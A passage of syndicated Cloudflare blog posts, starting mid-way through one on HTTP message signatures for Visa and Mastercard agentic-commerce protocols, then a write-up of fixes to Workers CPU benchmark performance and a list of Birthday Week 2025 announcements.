This allows merchants that integrate with these protocols to instantly recognize a trusted agent during two key interactions: the initial browsing phase to determine product details and final costs, and the final payment interaction to complete a purchase. Ultimately, this provides merchants with the tools to verify these signatures, identify trusted interactions, and securely manage how these agents can interact with their site.

How it works: leveraging HTTP message signatures 

To make this work, an ecosystem of participants need to be on the same page. It all starts with agent developers, who build the agents to shop on behalf of consumers. These agents then interact with merchants, who need a reliable way to assess the request is made on behalf of consumers. Merchants rely on networks like Cloudflare to verify the agent’s cryptographic signatures and ensure the interaction is legitimate. Finally, there are payment networks like Visa and Mastercard, who can link cardholder identity to agentic commerce transactions, helping ensure that transactions are verifiable and accountable.

When developing their protocols, Visa and Mastercard needed a secure way to authenticate each agent developer and securely transmit information from the agent to the merchant’s website. That’s where we came in and worked with their teams to build upon Web Bot Auth. Web Bot Auth proposals specify how developers of bots and agents can attach their cryptographic signatures in HTTP requests by using HTTP Message Signatures.

Both Visa and Mastercard protocols require agents to register and have their public keys (referenced as the keyid in the Signature-Input header) in a well-known directory, allowing merchants and networks to fetch the keys to validate these HTTP message signatures. To start, Visa and Mastercard will be hosting their own directories for Visa-registered and Mastercard-registered agents, respectively

The newly created agents then communicate their registration, identity, and payment details with the merchant using these HTTP Message Signatures. Both protocols build on Web Bot Auth by introducing a new tag that agents must supply in the Signature-Input header, which indicates whether the agent is browsing or purchasing. Merchants can use the tag to determine whether to interact with the agent. Agents must also include the nonce field, a unique sequence included in the signature, to provide protection against replay attacks.

An agent visiting a merchant’s website to browse a catalog would include an HTTP Message Signature in their request to verify their agent is authorized to browse the merchant’s storefront on behalf of a specific Visa cardholder:

GET /path/to/resource HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 Chrome/113.0.0 MyShoppingAgent/1.1
Signature-Input: 
  sig2=("@authority" "@path"); 
  created=1735689600; 
  expires=1735693200; 
  keyid="poqkLGiymh_W0uP6PZFw-dvez3QJT5SolqXBCW38r0U"; 
  alg="Ed25519";   nonce="e8N7S2MFd/qrd6T2R3tdfAuuANngKI7LFtKYI/vowzk4IAZyadIX6wW25MwG7DCT9RUKAJ0qVkU0mEeLEIW1qg=="; 
  tag="web-bot-auth"
Signature: sig2=:jdq0SqOwHdyHr9+r5jw3iYZH6aNGKijYp/EstF4RQTQdi5N5YYKrD+mCT1HA1nZDsi6nJKuHxUi/5Syp3rLWBA==:

Trusted Agent Protocol and Agent Pay are designed for merchants to benefit from its validation mechanisms without changing their infrastructure. Instead, merchants can set the rules for agent interactions on their site and rely upon Cloudflare as the validator. For these requests, Cloudflare will run the following checks:

  1. Confirm the presence of the Signature-Input and Signature headers.

  2. Pull the keyid from the Signature-Input. If Cloudflare has not previously retrieved and cached the key, fetch it from the public key directory.

  3. Confirm the current time falls between the created and expires timestamps.

  4. Check nonce uniqueness in the cache. By checking if a nonce has been recently used, Cloudflare can reject reused or expired signatures, ensuring the request is not a malicious copy of a prior, legitimate interaction.

  5. Check the validity of the tag, as defined by the protocol. If the agent is browsing, the tag should be agent-browser-auth. If the agent is paying, the tag should be agent-payer-auth

  6. Reconstruct the canonical signature base using the components from the Signature-Input header. 

  7. Perform the cryptographic ed25519 signature verification using the key supplied in keyid.

Here is an example from Visa on the flow for agent validation:


Mastercard’s Agent Pay validation flow is outlined below:


What’s next: Cloudflare’s Agent SDK & Managed Rules

We recently introduced support for x402 transactions into Cloudflare’s Agent SDK, allowing anyone building an agent to easily transact using the new x402 protocol. We will similarly be working with Visa and Mastercard over the coming months to bring support for their protocols directly to the Agents SDK. This will allow developers to manage their registered agent’s private keys and to easily create the correct HTTP message signatures to authorize their agent to browse and transact on a merchant website.

Conceptually, the requests in a Cloudflare Worker would look something like this:

/**
 * Pseudocode example of a Cloudflare Worker acting as a trusted agent.
 * This version explicitly illustrates the signing logic to show the core flow. 
 */


// Helper function to encapsulate the signing protocol logic.
async function createSignatureHeaders(targetUrl, credentials) {
    // Internally, this function would perform the detailed cryptographic steps:
    // 1. Generate timestamps and a unique nonce.
    // 2. Construct the 'Signature-Input' header string with all required parameters.
    // 3. Build the canonical 'Signature Base' string according to the spec.
    // 4. Use the private key to sign the base string.
    // 5. Return the fully formed 'Signature-Input' and 'Signature' headers.
    
    const signedHeaders = new Headers();
    
    signedHeaders.set('Signature-Input', 'sig2=(...); keyid="..."; ...');
    signedHeaders.set('Signature', 'sig2=:...');
    return signedHeaders;
}


export default {
    async fetch(request, env) {
        // 1. Load the final API endpoint and private signing credentials.
        const targetUrl = new URL(request.url).searchParams.get('target');
        const credentials = { 
            privateKey: env.PAYMENT_NETWORK_PRIVATE_KEY, 
            keyId: env.PAYMENT_NETWORK_KEY_ID 
        };


        // 2. Generate the required signature headers using the helper.
        const signatureHeaders = await createSignatureHeaders(targetUrl, credentials);


        // 3. Attach the newly created signature headers to the request for authentication.
        const signedRequestHeaders = new Headers(request.headers);
        signedRequestHeaders.set('Host', new URL(targetUrl).hostname);
        signedRequestHeaders.set('Signature-Input', signatureHeaders.get('Signature-Input'));
        signedRequestHeaders.set('Signature', signatureHeaders.get('Signature'));


       // 4. Forward the fully signed request to the protected API.
        return fetch(targetUrl, { headers: signedRequestHeaders });
    },
};

We’ll also be creating new managed rulesets for our customers that make it easy to allow agents that are using the Trusted Agent Protocol or Agent Pay. You might want to disallow most automated traffic to your storefront but not miss out on revenue opportunities from agents authorized to make a purchase on behalf of a cardholder. A managed rule would make this straightforward to implement. As the website owner, you could enable a managed rule that automatically allows all trusted agents registered with Visa or Mastercard to come to your site, passing your other bot protection & WAF rules. 

These will continue to evolve, and we will incorporate feedback to ensure that agent registration and validation works seamlessly across all networks and aligns with the Web Bot Auth proposal. American Express will also be leveraging Web Bot Auth as the foundation to their agentic commerce offering.

How to get started today 

You can start building with Cloudflare’s Agent SDK today, see a sample implementation of the Trusted Agent Protocol, and view the Trusted Agent Protocol and Agent Pay docs.

We look forward to your contribution and feedback, should this be engaging on GitHub, building apps, or engaging in mailing lists discussions.

Unpacking Cloudflare Workers CPU Performance Benchmarks

Post Syndicated from Kenton Varda original https://blog.cloudflare.com/unpacking-cloudflare-workers-cpu-performance-benchmarks/

On October 4, independent developer Theo Browne published a series of benchmarks designed to compare server-side JavaScript execution speed between Cloudflare Workers and Vercel, a competing compute platform built on AWS Lambda. The initial results showed Cloudflare Workers performing worse than Node.js on Vercel at a variety of CPU-intensive tasks, by a factor of as much as 3.5x.

We were surprised by the results. The benchmarks were designed to compare JavaScript execution speed in a CPU-intensive workload that never waits on external services. But, Cloudflare Workers and Node.js both use the same underlying JavaScript engine: V8, the open source engine from Google Chrome. Hence, one would expect the benchmarks to be executing essentially identical code in each environment. Physical CPUs can vary in performance, but modern server CPUs do not vary by anywhere near 3.5x.

On investigation, we discovered a wide range of small problems that contributed to the disparity, ranging from some bad tuning in our infrastructure, to differences between the JavaScript libraries used on each platform, to some issues with the test itself. We spent the week working on many of these problems, which means over the past week Workers got better and faster for all of our customers. We even fixed some problems that affect other compute providers but not us, such as an issue that made trigonometry functions much slower on Vercel. This post will dig into all the gory details.

It’s important to note that the original benchmark was not representative of billable CPU usage on Cloudflare, nor did the issues involved impact most typical workloads. Most of the disparity was an artifact of the specific benchmark methodology. Read on to understand why.

With our fixes, the results now look much more like we’d expect:


There is still work to do, but we’re happy to say that after these changes, Cloudflare now performs on par with Vercel in every benchmark case except the one based on Next.js. On that benchmark, the gap has closed considerably, and we expect to be able to eliminate it with further improvements detailed later in this post.

We are grateful to Theo for highlighting areas where we could make improvements, which will now benefit all our customers, and even many who aren’t our customers.

Our benchmark methodology

We wanted to run Theo’s test with no major design changes, in order to keep numbers comparable. Benchmark cases are nearly identical to Theo’s original test but we made a couple changes in how we ran the test, in the hopes of making the results more accurate:

  • Theo ran the test client on a laptop connected by a Webpass internet connection in San Francisco, against Vercel instances running in its sfo1 region. In order to make our results easier to reproduce, we chose instead to run our test client directly in AWS’s us-east-1 datacenter, invoking Vercel instances running in its iad1 region (which we understand to be in the same building). We felt this would minimize any impact from network latency. Because of this, Vercel’s numbers are slightly better in our results than they were in Theo’s.

  • We chose to use Vercel instances with 1 vCPU instead of 2. All of the benchmarks are single-threaded workloads, meaning they cannot take advantage of a second CPU anyway. Vercel’s CTO, Malte Ubl, had stated publicly on X that using single-CPU instances would make no difference in this test, and indeed, we found this to be correct. Using 1 vCPU makes it easier to reason about pricing, since both Vercel and Cloudflare charge for CPU time ($0.128/hr for Vercel in iad1, and $0.072/hr for Cloudflare globally).

  • We made some changes to fix bugs in the test, for which we submitted a pull request. More on this below.

Cloudflare platform improvements

Theo’s benchmarks covered a variety of frameworks, making it clear that no single JavaScript library could be at fault for the general problem. Clearly, we needed to look first at the Workers Runtime itself. And so we did, and we found two problems – not bugs, but tuning and heuristic choices which interacted poorly with the benchmarks as written.

Sharding and warm isolate routing: A problem of scheduling, not CPU speed

Over the last year we shipped smarter routing that sends traffic to warm isolates more often. That cuts cold starts for large apps, which matters for frameworks with heavy initialization requirements like Next.js. The original policy optimized for latency and throughput across billions of requests, but was less optimal for heavily CPU-bound workloads for the same reason that such workloads cause performance issues in other platforms like Node.js: When the CPU is busy computing an expensive operation for one request, other requests sent to the same isolate must wait for it to finish before they can proceed.

The system uses heuristics to detect when requests are getting blocked behind each other, and automatically spin up more isolates to compensate. However, these heuristics are not precise, and the particular workload generated by Theo’s tests – in which a burst of expensive traffic would come from a single client – played poorly with our existing algorithm. As a result, the benchmarks showed much higher latency (and variability in latency) than would normally be expected.

It’s important to understand that, as a result of this problem, the benchmark was not really measuring CPU time. Pricing on the Workers platform is based on CPU time – that is, time spent actually executing JavaScript code, as opposed to time waiting for things. Time spent waiting for the isolate to become available makes the request take longer, but is not billed as CPU time against the waiting request. So, this problem would not have affected your bill.

After analyzing the benchmarks, we updated the algorithm to detect sustained CPU-heavy work earlier, then bias traffic so that new isolates spin up faster. The result is that Workers can more effectively and efficiently autoscale when different workloads are applied. I/O-bound workloads coalesce into individual already warm isolates while CPU-bound are directed so that they do not block each other. This change has already been rolled out globally and is enabled automatically for everyone. It should be pretty clear from the graph when the change was rolled out:


V8 garbage collector tuning

While this scheduling issue accounted for the majority of the disparity in the benchmark, we did find a minor issue affecting code execution performance during our testing.

The range of issues that we uncovered in the framework code in these benchmarks repeatedly pointed at garbage collection and memory management issues as being key contributors to the results. But, we would expect these to be an issue with the same frameworks running in Node.js as well. To see exactly what was going on differently with Workers and why it was causing such a significant degradation in performance, we had to look inwards at our own memory management configuration.

The V8 garbage collector has a huge number of knobs that can be tuned that directly impact performance. One of these is the size of the “young generation”. This is where newly created objects go initially. It’s a memory area that’s less compact, but optimized for short-lived objects. When objects have bounced around the “young space” for a few generations they get moved to the old space, which is more compact, but requires more CPU to reclaim.

V8 allows the embedding runtime to tune the size of the young generation. And it turns out, we had done so. Way back in June of 2017, just two months after the Workers project kicked off, we – or specifically, I, Kenton, as I was the only engineer on the project at the time – had configured this value according to V8’s recommendations at the time for environments with 512MB of memory or less. Since Workers defaults to a limit of 128MB per isolate, this seemed appropriate.

V8’s entire garbage collector has changed dramatically since 2017. When analyzing the benchmarks, it became apparent that the setting which made sense in 2017 no longer made sense in 2025, and we were now limiting V8’s young space too rigidly. Our configuration was causing V8’s garbage collection to work harder and more frequently than it otherwise needed to. As a result, we have backed off on the manual tuning and now allow V8 to pick its young space size more freely, based on its internal heuristics. This is already live on Cloudflare Workers, and it has given an approximately 25% boost to the benchmarks with only a small increase in memory usage. Of course, the benchmarks are not the only Workers that benefit: all Workers should now be faster. That said, for most Workers the difference has been much smaller.

Tuning OpenNext for performance

The platform changes solved most of the problem. Following the changes, our testing showed we were now even on all of the benchmarks save one: Next.js.

Next.js is a popular web application framework which, historically, has not had built-in support for hosting on a wide range of platforms. Recently, a project called OpenNext has arisen to fill the gap, making Next.js work well on many platforms, including Cloudflare. On investigation, we found several missing optimizations and other opportunities to improve performance, explaining much of why the benchmark performed poorly on Workers.

Unnecessary allocations and copies

When profiling the benchmark code, we noticed that garbage collection was dominating the timeline. From 10-25% of the request processing time was being spent reclaiming memory.



So we dug in and discovered that OpenNext, and in some cases Next.js and React itself, will often create unnecessary copies of internal data buffers at some of the worst times during the handling of the process. For instance, there’s one pipeThrough() operation in the rendering pipeline that we saw creating no less than 50 2048-byte Buffer instances, whether they are actually used or not.

We further discovered that on every request, the Cloudflare OpenNext adapter has been needlessly copying every chunk of streamed output data as it’s passed out of the renderer and into the Workers runtime to return to users. Given this benchmark returns a 5 MB result on every request, that’s a lot of data being copied!

In other places, we found that arrays of internal Buffer instances were being copied and concatenated using Buffer.concat for no other reason than to get the total number of bytes in the collection. That is, we spotted code of the form getBody().length. The function getBody() would concatenate a large number of buffers into a single buffer and return it, without storing the buffer anywhere. So, all that work was being done just to read the overall length. Obviously this was not intended, and fixing it was an easy win.

We’ve started opening a series of pull requests in OpenNext to fix these issues, and others in hot paths, removing some unnecessary allocations and copies:

We’re not done. We intend to keep iterating through OpenNext code, making improvements wherever they’re needed – not only in the parts that run on Workers. Many of these improvements apply to other OpenNext platforms. The shared goal of OpenNext is to make NextJS as fast as possible regardless of where you choose to run your code.

Inefficient Streams Adapters

Much of the Next.js code was written to use Node.js’s APIs for byte streams. Workers, however, prefers the web-standard Streams API, and uses it to represent HTTP request and response bodies. This necessitates using adapters to convert between the two APIs. When investigating the performance bottlenecks, we found a number of examples where inefficient streams adapters are being needlessly applied. For example:

const stream = Readable.toWeb(Readable.from(res.getBody()))

res.getBody() was performing a Buffer.concat(chunks) to copy accumulated chunks of data into a new Buffer, which was then passed as an iterable into a Node.js stream.Readable that was then wrapped by an adapter that returns a ReadableStream. While these utilities do serve a useful purpose, this becomes a data buffering nightmare since both Node.js streams and Web streams each apply their own internal buffers! Instead we can simply do:

const stream = ReadableStream.from(chunks);

This returns a ReadableStream directly from the accumulated chunks without additional copies, extraneous buffering, or passing everything through inefficient adaptation layers.

In other places we see that Next.js and React make extensive use of ReadableStream to pass bytes through, but the streams being created are value-oriented rather than byte-oriented! For example,

const readable = new ReadableStream({
  pull(controller) {
    controller.enqueue(chunks.shift());
    if (chunks.length === 0) {
      controller.close();
    }
});  // Default highWaterMark is 1!

Seems perfectly reasonable. However, there’s an issue here. If the chunks are Buffer or Uint8Array instances, every instance ends up being a separate read by default. So if the chunk is only a single byte, or 1000 bytes, that’s still always two reads. By converting this to a byte stream with a reasonable high water mark, we can make it possible to read this stream much more efficiently:

const readable = new ReadableStream({
  type: 'bytes',
  pull(controller) {
    controller.enqueue(chunks.shift());
    if (chunks.length === 0) {
      controller.close();
    }
}, { highWaterMark: 4096 });

Now, the stream can be read as a stream of bytes rather than a stream of distinct JavaScript values, and the individual chunks can be coalesced internally into 4096 byte chunks, making it possible to optimize the reads much more efficiently. Rather than reading each individual enqueued chunk one at a time, the ReadableStream will proactively call pull() repeatedly until the highWaterMark is reached. Reads then do not have to ask the stream for one chunk of data at a time.

While it would be best for the rendering pipeline to be using byte streams and paying attention to back pressure signals more, our implementation can still be tuned to better handle cases like this.

The bottom line? We’ve got some work to do! There are a number of improvements to make in the implementation of OpenNext and the adapters that allow it to work on Cloudflare that we will continue to investigate and iterate on. We’ve made a handful of these fixes already and we’re already seeing improvements. Soon we also plan to start submitting patches to Next.js and React to make further improvements upstream that will ideally benefit the entire ecosystem.

JSON parsing

Aside from buffer allocations and streams, one additional item stood out like a sore thumb in the profiles: JSON.parse() with a reviver function. This is used in both React and Next.js and in our profiling this was significantly slower than it should be. We built a microbenchmark and found that JSON.parse with a reviver argument recently got even slower when the standard added a third argument to the reviver callback to provide access to the JSON source context.

For those unfamiliar with the reviver function, it allows an application to effectively customize how JSON is parsed. But it has drawbacks. The function gets called on every key-value pair included in the JSON structure, including every individual element of an Array that gets serialized. In Theo’s NextJS benchmark, in any single request, it ends up being called well over 100,000 times!

Even though this problem affects all platforms, not just ours, we decided that we weren’t just going to accept it. After all, we have contributors to V8 on the Workers runtime team! We’ve upstreamed a V8 patch that can speed up JSON.parse() with revivers by roughly 33 percent. That should be in V8 starting with version 14.3 (Chrome 143) and can help everyone using V8, not just Cloudflare: Node.js, Chrome, Deno, the entire ecosystem.  If you are not using Cloudflare Workers or didn’t change the syntax of your reviver you are currently suffering under the red performance bar.

We will continue to work with framework authors to reduce overhead in hot paths. Some changes belong in the frameworks, some belong in the engine, some in our platform.

Node.js’s trigonometry problem

We are engineers, and we like to solve engineering problems — whether our own, or for the broader community.

Theo’s benchmarks were actually posted in response to a different benchmark by another author which compared Cloudflare Workers against Vercel. The original benchmark focused on calling trigonometry functions (e.g. sine and cosine) in a tight loop. In this benchmark, Cloudflare Workers performed 3x faster than Node.js running on Vercel.

The author of the original benchmark offered this as evidence that Cloudflare Workers are just faster. Theo disagreed, and so did we. We expect to be faster, but not by 3x! We don’t implement math functions ourselves; these come with V8. We weren’t happy to just accept the win, so we dug in.

It turns out that Node.js is not using the latest, fastest path for these functions. Node.js can be built with either the clang or gcc compilers, and is written to support a broader range of operating systems and architectures than Workers. This means that Node.js’ compilation often ends up using a lowest-common denominator for some things in order to provide support for the broadest range of platforms. V8 includes a compile-time flag that, in some configurations, allows it to use a faster implementation of the trig functions. In Workers, mostly by coincidence, that flag is enabled by default. In Node.js, it is not. We’ve opened a pull request to enable the flag in Node.js so that everyone benefits, at least on platforms where it can be supported.

Assuming that lands, and once AWS Lambda and Vercel are able to pick it up, we expect this specific gap to go away, making these operations faster for everyone. This change won’t benefit our customers, since Cloudflare Workers already uses the faster trig functions, but a bug is a bug and we like making everything faster.

Benchmarks are hard

Even the best benchmarks have bias and tradeoffs. It’s difficult to create a benchmark that is truly representative of real-world performance, and all too easy to misinterpret the results of benchmarks that are not. We particularly liked Planetscale’s take on this subject.

These specific CPU-bound tests are not an ideal choice to represent web applications. Theo even notes this in his video. Most real-world applications on Workers and Vercel are bound by databases, downstream services, network, and page size. End user experience is what matters. CPU is one piece of that picture. That said, if a benchmark shows us slower, we take it seriously.

While the benchmarks helped us find and fix many real problems, we also found a few problems with the benchmarks themselves, which contributed to the apparent disparity in speed:

Running locally

The benchmark is designed to be run on your laptop, from which it hits Cloudflare’s and Vercel’s servers over the Internet. It makes the assumption that latency observed from the client is a close enough approximation of server-side CPU time. The reasons are fair: As Theo notes, Cloudflare does not permit an application to measure its own CPU time, in order to prevent timing side channel attacks. Actual CPU time can be seen in logs after the fact, but gathering those may be a lot of work. It’s just easier to measure time from the client.

However, as Cloudflare and Vercel are hosted from different data centers, the network latency to each can be a factor in the benchmark, and this can skew the results. Typically, this effect will favor Cloudflare, because Cloudflare can run your Worker in locations spread across 330+ cities worldwide, and will tend to choose the closest one to you. Vercel, on the other hand, usually places compute in a central location, so latency will vary depending on your distance from that location.

For our own testing, to minimize this effect, we ran the benchmark client from a VM on AWS located in the same data center as our Vercel instances. Since Cloudflare is well-connected to every AWS location, we think this should have eliminated network latency from the picture. We chose AWS’s us-east-1 / Vercel’s iad1 for our test as it is widely seen as the default choice; any other choice could draw questions about cherry-picking.

Not all CPUs are equal

Cloudflare’s servers aren’t all identical. Although we refresh them aggressively, there will always be multiple generations of hardware in production at any particular time. Currently, this includes generations 10, 11, and 12 of our server hardware.

Other cloud providers are no different. No cloud provider simply throws away all their old servers every time a new version becomes available.

Of course, newer CPUs run faster, even for single-threaded workloads. The differences are not as large as they used to be 20-30 years ago, but they are not nothing. As such, an application may get (a little bit) lucky or unlucky depending on what machine it is assigned to.

In cloud environments, even identical CPUs can yield different performance depending on circumstances, due to multitenancy. The server your application is assigned to is running many others as well. In AWS Lambda, a server may be running hundreds of applications; in Cloudflare, with our ultra-efficient runtime, a server may be running thousands. These “noisy neighbors” won’t share the same CPU core as your app, but they may share other resources, such as memory bandwidth. As a result, performance can vary.

It’s important to note that these problems create correlated noise. That is, if you run the test again, the application is likely to remain assigned to the same machines as before – this is true of both Cloudflare and Vercel. So, this noise cannot be corrected by simply running more iterations. To correct for this type of noise on Cloudflare, one would need to initiate requests from a variety of geographic locations, in order to hit different Cloudflare data centers and therefore different machines. But, that is admittedly a lot of work. (We are not familiar with how best to get an application to switch machines on Vercel.)

A Next.js config bug

The Cloudflare version of the NextJS benchmark was not configured to use force-dynamic while the Vercel version was. This triggered curious behavior. Our understanding is that pages which are not “dynamic” should normally be rendered statically at build time. With OpenNext, however, it appears the pages are still rendered dynamically, but if multiple requests for the same page are received at the same time, OpenNext will only invoke the rendering once. Before we made the changes to fix our scheduling algorithm to avoid sending too many requests to the same isolate, this behavior may have somewhat counteracted that problem. Theo reports that he had disabled force-dynamic in the Cloudflare version specifically for this reason: with it on, our results were so bad as to appear outright broken, so he intentionally turned it off.

Ironically, though, once we fixed the scheduling issue, using “static” rendering (i.e. not enabling force-dynamic) hurt Cloudflare’s performance for other reasons. It seems that when OpenNext renders a “cacheable” page, streaming of the response body is inhibited. This interacted poorly with a property of the benchmark client: it measured time-to-first-byte (TTFB), rather than total request/response time. When running in dynamic mode – as the test did on Vercel – the first byte would be returned to the client before the full page had been rendered. The rest of the rendering would happen as bytes streamed out. But with OpenNext in non-dynamic mode, the entire payload was rendered into a giant buffer upfront, before any bytes were returned to the client.

Due to the TTFB behavior of the benchmark client, in dynamic mode, the benchmark actually does not measure the time needed to fully render the page. We became suspicious when we noticed that Vercel’s observability tools indicated more CPU time had been spent than the benchmark itself had reported.

One option would have been to change the benchmarks to use TTLB instead – that is, wait until the last byte is received before stopping the timer. However, this would make the benchmark even more affected by network differences: The responses are quite large, ranging from 2MB to 15MB, and so the results could vary depending on the bandwidth to the provider. Indeed, this would tend to favor Cloudflare, but as the point of the test is to measure CPU speed, not bandwidth, it would be an unfair advantage.

Once we changed the Cloudflare version of the test to use force-dynamic as well, matching the Vercel version, the streaming behavior then matched, making the request fair. This means that neither version is actually measuring the cost of rendering the full page to HTML, but at least they are now measuring the same thing.

As a side note, the original behavior allowed us to spot that OpenNext has a couple of performance bottlenecks in its implementation of the composable cache it uses to deduplicate rendering requests. While fixes to these aren’t going to impact the numbers for this particular set of benchmarks, we’re working on improving those pieces also.

A React SSR config bug

The React SSR benchmark contained a more basic configuration error. React inspects the environment variable NODE_ENV to decide whether the environment is “production” or a development environment. Many Node.js-based environments, including Vercel, set this variable automatically in production. Many frameworks, such as OpenNext, automatically set this variable for Workers in production as well. However, the React SSR benchmark was written against lower-level React APIs, not using any framework. In this case, the NODE_ENV variable wasn’t being set at all.

And, unfortunately, when NODE_ENV is not set, React defaults to “dev mode”, a mode that contains extra debugging checks and is therefore much slower than production mode. As a result, the numbers for Workers were much worse than they should have been.

Arguably, it may make sense for Workers to set this variable automatically for all deployed workers, particularly when Node.js compatibility is enabled. We are looking into doing this in the future, but for now we’ve updated the test to set it directly.

What we’re going to do next

Our improvements to the Workers Runtime are already live for all workers, so you do not need to change anything. Many apps will already see faster, steadier tail latency on compute heavy routes with less jitter during bursts. In places where garbage collection improved, some workloads will also use fewer billed CPU seconds.

We also sent Theo a pull request to update OpenNext with our improvements there, and with other test fixes.

But we’re far from done. We still have work to do to close the gap between OpenNext and Next.js on Vercel – but given the other benchmark results, it’s clear we can get there. We also have plans for further improvements to our scheduling algorithm, so that requests almost never block each other. We will continue to improve V8, and even Node.js – the Workers team employs multiple core contributors to each project. Our approach is simple: improve open source infrastructure so that everyone gets faster, then make sure our platform makes the most of those improvements.

And, obviously, we’ll be writing more benchmarks, to make sure we’re catching these kinds of issues ourselves in the future. If you have a benchmark that shows Workers being slower, send it to us with a repro. We will profile it, fix what we can upstream, and share back what we learn!

15 years of helping build a better Internet: a look back at Birthday Week 2025

Post Syndicated from Nikita Cano original https://blog.cloudflare.com/birthday-week-2025-wrap-up/

Cloudflare launched fifteen years ago with a mission to help build a better Internet. Over that time the Internet has changed and so has what it needs from teams like ours.  In this year’s Founder’s Letter, Matthew and Michelle discussed the role we have played in the evolution of the Internet, from helping encryption grow from 10% to 95% of Internet traffic to more recent challenges like how people consume content. 

We spend Birthday Week every year releasing the products and capabilities we believe the Internet needs at this moment and around the corner. Previous Birthday Weeks saw the launch of IPv6 gateway in 2011,  Universal SSL in 2014, Cloudflare Workers and unmetered DDoS protection in 2017, Cloudflare Radar in 2020, R2 Object Storage with zero egress fees in 2021,  post-quantum upgrades for Cloudflare Tunnel in 2022, Workers AI and Encrypted Client Hello in 2023. And those are just a sample of the launches.

This year’s themes focused on helping prepare the Internet for a new model of monetization that encourages great content to be published, fostering more opportunities to build community both inside and outside of Cloudflare, and evergreen missions like making more features available to everyone and constantly improving the speed and security of what we offer.

We shipped a lot of new things this year. In case you missed the dozens of blog posts, here is a breakdown of everything we announced during Birthday Week 2025. 

Monday, September 22

What

In a sentence …

Help build the future: announcing Cloudflare’s goal to hire 1,111 interns in 2026

To invest in the next generation of builders, we announced our most ambitious intern program yet with a goal to hire 1,111 interns in 2026.

Supporting the future of the open web: Cloudflare is sponsoring Ladybird and Omarchy

To support a diverse and open Internet, we are now sponsoring Ladybird (an independent browser) and Omarchy (an open-source Linux distribution and developer environment).

Come build with us: Cloudflare’s new hubs for startups

We are opening our office doors in four major cities (San Francisco, Austin, London, and Lisbon) as free hubs for startups to collaborate and connect with the builder community.

Free access to Cloudflare developer services for non-profit and civil society organizations

We extended our Cloudflare for Startups program to non-profits and public-interest organizations, offering free credits for our developer tools.

Introducing free access to Cloudflare developer features for students

We are removing cost as a barrier for the next generation by giving students with .edu emails 12 months of free access to our paid developer platform features.

Cap’n Web: a new RPC system for browsers and web servers

We open-sourced Cap’n Web, a new JavaScript-native RPC protocol that simplifies powerful, schema-free communication for web applications.

A lookback at Workers Launchpad and a warm welcome to Cohort #6

We announced Cohort #6 of the Workers Launchpad, our accelerator program for startups building on Cloudflare.

Tuesday, September 23

What

In a sentence …

Building unique, per-customer defenses against advanced bot threats in the AI era

New anomaly detection system that uses machine learning trained on each zone to build defenses against AI-driven bot attacks. 

Why Cloudflare, Netlify, and Webflow are collaborating to support Open Source tools

To support the open web, we joined forces with Webflow to sponsor Astro, and with Netlify to sponsor TanStack.

Launching the x402 Foundation with Coinbase, and support for x402 transactions

We are partnering with Coinbase to create the x402 Foundation, encouraging the adoption of the x402 protocol to allow clients and services to exchange value on the web using a common language

Helping protect journalists and local news from AI crawlers with Project Galileo

We are extending our free Bot Management and AI Crawl Control services to journalists and news organizations through Project Galileo.

Cloudflare Confidence Scorecards – making AI safer for the Internet

Automated evaluation of AI and SaaS tools, helping organizations to embrace AI without compromising security.

Wednesday, September 24

What

In a sentence …

Automatically Secure: how we upgraded 6,000,000 domains by default

Our Automatic SSL/TLS system has upgraded over 6 million domains to more secure encryption modes by default and will soon automatically enable post-quantum connections.

Giving users choice with Cloudflare’s new Content Signals Policy

The Content Signals Policy is a new standard for robots.txt that lets creators express clear preferences for how AI can use their content.

To build a better Internet in the age of AI, we need responsible AI bot principles

A proposed set of responsible AI bot principles to start a conversation around transparency and respect for content creators’ preferences.

Securing data in SaaS to SaaS applications

New security tools to give companies visibility and control over data flowing between SaaS applications.

Securing today for the quantum future: WARP client now supports post-quantum cryptography (PQC)

Cloudflare’s WARP client now supports post-quantum cryptography, providing quantum-resistant encryption for traffic. 

A simpler path to a safer Internet: an update to our CSAM scanning tool

We made our CSAM Scanning Tool easier to adopt by removing the need to create and provide unique credentials, helping more site owners protect their platforms.

Thursday, September 25

What

In a sentence …

Every Cloudflare feature, available to everyone

We are making every Cloudflare feature, starting with Single Sign On (SSO), available for anyone to purchase on any plan. 

Cloudflare’s developer platform keeps getting better, faster, and more powerful

Updates across Workers and beyond for a more powerful developer platform – such as support for larger and more concurrent Container images, support for external models from OpenAI and Anthropic in AI Search (previously AutoRAG), and more. 

Partnering to make full-stack fast: deploy PlanetScale databases directly from Workers

You can now connect Cloudflare Workers to PlanetScale databases directly, with connections automatically optimized by Hyperdrive.

Announcing the Cloudflare Data Platform

A complete solution for ingesting, storing, and querying analytical data tables using open standards like Apache Iceberg. 

R2 SQL: a deep dive into our new distributed query engine

A technical deep dive on R2 SQL, a serverless query engine for petabyte-scale datasets in R2.

Safe in the sandbox: security hardening for Cloudflare Workers

A deep-dive into how we’ve hardened the Workers runtime with new defense-in-depth security measures, including V8 sandboxes and hardware-assisted memory protection keys.

Choice: the path to AI sovereignty

To champion AI sovereignty, we’ve added locally-developed open-source models from India, Japan, and Southeast Asia to our Workers AI platform.

Announcing Cloudflare Email Service’s private beta

We announced the Cloudflare Email Service private beta, allowing developers to reliably send and receive transactional emails directly from Cloudflare Workers.

A year of improving Node.js compatibility in Cloudflare Workers

There are hundreds of new Node.js APIs now available that make it easier to run existing Node.js code on our platform. 

Friday, September 26

What

In a sentence …

Cloudflare just got faster and more secure, powered by Rust

We have re-engineered our core proxy with a new modular, Rust-based architecture, cutting median response time by 10ms for millions. 

Introducing Observatory and Smart Shield

New monitoring tools in the Cloudflare dashboard that provide actionable recommendations and one-click fixes for performance issues.

Monitoring AS-SETs and why they matter

Cloudflare Radar now includes Internet Routing Registry (IRR) data, allowing network operators to monitor AS-SETs to help prevent route leaks.

An AI Index for all our customers

We announced the private beta of AI Index, a new service that creates an AI-optimized search index for your domain that you control and can monetize.

Introducing new regional Internet traffic and Certificate Transparency insights on Cloudflare Radar

Sub-national traffic insights and Certificate Transparency dashboards for TLS monitoring.

Eliminating Cold Starts 2: shard and conquer

We have reduced Workers cold starts by 10x by implementing a new “worker sharding” system that routes requests to already-loaded Workers.

Network performance update: Birthday Week 2025

The TCP Connection Time (Trimean) graph shows that we are the fastest TCP connection time in 40% of measured ISPs – and the fastest across the top networks.

How Cloudflare uses performance data to make the world’s fastest global network even faster

We are using our network’s vast performance data to tune congestion control algorithms, improving speeds by an average of 10% for QUIC traffic.

Come build with us!

